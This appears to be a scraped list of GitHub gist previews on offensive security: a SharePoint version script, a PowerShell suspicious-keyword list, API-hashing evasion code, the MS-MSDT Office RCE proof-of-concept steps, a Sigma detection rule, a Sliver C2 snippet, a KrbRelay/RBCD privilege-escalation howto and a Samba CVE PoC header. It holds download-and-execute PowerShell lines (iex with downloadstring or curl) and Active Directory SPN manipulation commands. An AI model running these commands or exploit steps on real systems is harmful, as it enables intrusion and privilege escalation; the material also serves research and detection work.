Curtis Houghton curtishoughton

  • England, United Kingdom
@LuemmelSec
LuemmelSec / Get-SPVersionInfo.ps1
Last active December 9, 2024 10:08
Script to get SharePoint Version and release date remotely
# To use the function, call it like this:
# iex(new-object net.webclient).downloadstring("https://gist.githubusercontent.com/LuemmelSec/208b8ba52b645ec189031d2b5200f76e/raw/c6c1008da1b5670d3fb549578968c2a2f086a00b/Get-SPVersionInfo.ps1")
# Get-SPVersionInfo -ServerUrl "https://my-sharepointserver"
function Get-SPVersionInfo {
param (
[string]$ServerUrl,
[switch]$SkipCertificateCheck, # Flag to skip certificate checks
[switch]$SkipHttpErrorCheck # Flag to skip HTTP error handling
)
@nasbench
nasbench / pwsh_dirty_words.yml
Last active March 19, 2025 19:57
List of suspicious strings used by PowerShell `SuspiciousContentChecker` function
# Source: System.Management.Automation.dll
# This list is used to determine if a ScriptBlock contains potentially suspicious content.
# If a match is found, an automatic event 4104 with "warning" level is generated.
# https://github.com/PowerShell/PowerShell/blob/master/src/System.Management.Automation/engine/runtime/CompiledScriptBlock.cs
- "Add-Type"
- "AddSecurityPackage"
- "AdjustTokenPrivileges"
- "AllocHGlobal"
- "BindingFlags"
- "Bypass"
@rad9800
rad9800 / apihash.c
Last active October 4, 2023 00:47
Using macros and constexpr to make API hashing a bit more friendly
#include <Windows.h>
#include <winternl.h>
#pragma comment(linker, "/ENTRY:entry")
// Define hashing algorithm to use
#define HASHALGO HashStringDjb2
// Define how large you'd like cache to be
#define CACHE 50
@tothi
tothi / ms-msdt.MD
Last active June 16, 2025 21:37
The MS-MSDT 0-day Office RCE Proof-of-Concept Payload Building Process

MS-MSDT 0-day Office RCE

MS Office docx files may contain external OLE Object references as HTML files. There is a URL scheme "ms-msdt:" that invokes the msdt diagnostic tool, which is capable of executing arbitrary code (specified in its parameters).

The result is a terrifying attack vector for getting RCE through opening malicious docx files (without using macros).

Here are the steps to build a Proof-of-Concept docx:

  1. Open Word (used up-to-date 2019 Pro, 16.0.10386.20017), create a dummy document, insert an (OLE) object (as a Bitmap Image), save it in docx.
@kevthehermit
kevthehermit / detection.yml
Last active September 16, 2022 22:55
Office --> MSDT --> RCE
title: Sysmon Office MSDT
id: c95ed569-5da4-48b3-9698-5e429964556c
description: Detects MSDT Exploit Attempts
status: experimental
author: kevthehermit
date: 2022/05/30
references:
- https://docs.microsoft.com/en-us/sysinternals/downloads/sysmon
- https://gist.github.com/kevthehermit/5c8d52af388989cfa0ea38feace977f2
logsource:
@freefirex
freefirex / gist:dec308e1d95c6ea090c61d31a4db6f89
Last active April 27, 2025 08:22
vscode user snippet for sliver coff extensions
{
"SliverExtension" :{
"prefix": "sliverext",
"body": [ "{",
"\"name\": \"$1\",",
"\"version\": \"0.0.0\",",
"\"command_name\": \"$2\",",
"\"extension_author\": \"$3\",",
"\"original_author\": \"$3\",",
"\"repo_url\": \"N/A\",",
iex(curl https://raw.githubusercontent.com/samratashok/ADModule/master/Import-ActiveDirectory.ps1 -UseBasicParsing )
Import-ActiveDirectory
Set-ADComputer WIN-JQTB1UHHF2S -ServicePrincipalNames @{REPLACE="HOST/WIN-JQTB1UHHF2S","RestrictedKrbHost/WIN-JQTB1UHHF2S"} -Verbose
# In my testing I had to set DNSHostName to $null first
Set-ADComputer WIN-JQTB1UHHF2S -DNSHostName $null
Set-ADComputer WIN-JQTB1UHHF2S -DNSHostName dc1.batcave.local
@tothi
tothi / krbrelay_privesc_howto.md
Last active April 23, 2025 01:59
Privilege Escalation using KrbRelay and RBCD

KrbRelay with RBCD Privilege Escalation HOWTO

Short HOWTO about one use case of the work from Cube0x0 (KrbRelay) and others.

TL;DR

No-Fix Local Privilege Escalation from low-privileged domain user to local system on domain-joined computers.

Prerequisites:

  • LDAP signing not required on Domain Controller (default!)
@0xsha
0xsha / CVE-2021-44142.py
Last active October 3, 2023 13:34
CVE-2021-44142 PoC Samba 4.15.0 OOB Read/Write
# CVE-2021-44142 PoC Samba 4.15.0 OOB Read/Write
# (C) 2022 - 0xSha.io - @0xSha
# This PoC is un-weaponized and for educational purposes only.
# To learn how to use the PoC, please read the writeup:
# https://0xsha.io/blog/a-samba-horror-story-cve-2021-44142
# requires samba4-python
# References:
# https://www.thezdi.com/blog/2022/2/1/cve-2021-44142-details-on-a-samba-code-execution-bug-demonstrated-at-pwn2own-austin
# Patch : https://attachments.samba.org/attachment.cgi?id=17092